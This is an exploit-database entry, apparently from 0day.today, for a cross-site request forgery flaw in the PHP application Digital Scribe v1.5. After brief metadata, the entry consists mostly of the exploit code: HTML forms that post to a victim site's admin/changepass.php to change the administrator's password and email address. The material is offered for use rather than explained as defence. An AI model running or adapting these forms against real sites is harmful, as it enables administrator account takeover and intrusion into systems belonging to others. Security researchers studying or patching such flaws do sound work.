[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Digital Scribe v1.5 CSRF Vulnerability

Author
Muhammet Cagri
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17269
Category
web applications
Date add
11-12-2011
Platform
php
Digital Scribe v1.5 CSRF Vulnerability
 
Author : Muhammet Cagri Tepebasili
 
Date : 11.11.2011
 
Script Homepage and Download : http://www.digital-scribe.org/
 
Version : 1.5
 
Tested on : Linux Mint 11
 
Exploit :
 
 
<fromtr>
<P>
<table border=1><tr><td>
<FORM METHOD=POST ACTION=[victim]/admin/
changepass.php>
<BR>New Password: <INPUT TYPE=TEXT NAME=pass>
<INPUT TYPE=HIDDEN NAME=ID VALUE=<?php echo "$_SESSION[secure_id]"; ?>>
<BR><INPUT TYPE=submit NAME=submit VALUE="Update">
</form></td></tr></table>
 
 
<P>
<table border=1><tr><td>
<FORM METHOD=POST ACTION=[victim]/admin/changepass.php>
<BR>New E-mail: <INPUT TYPE=TEXT NAME=emailad VALUE=<?php echo "$emailad";
?>>
<INPUT TYPE=HIDDEN NAME=ID VALUE=<?php echo "$_SESSION[secure_id]"; ?>>
<BR><INPUT TYPE=submit NAME=chng_email VALUE="Update">
</form></td></tr></table>
</fromtr>
 
Greetz : Eymen Sen and Cafer K.Sezer



#  0day.today [2024-12-26]  #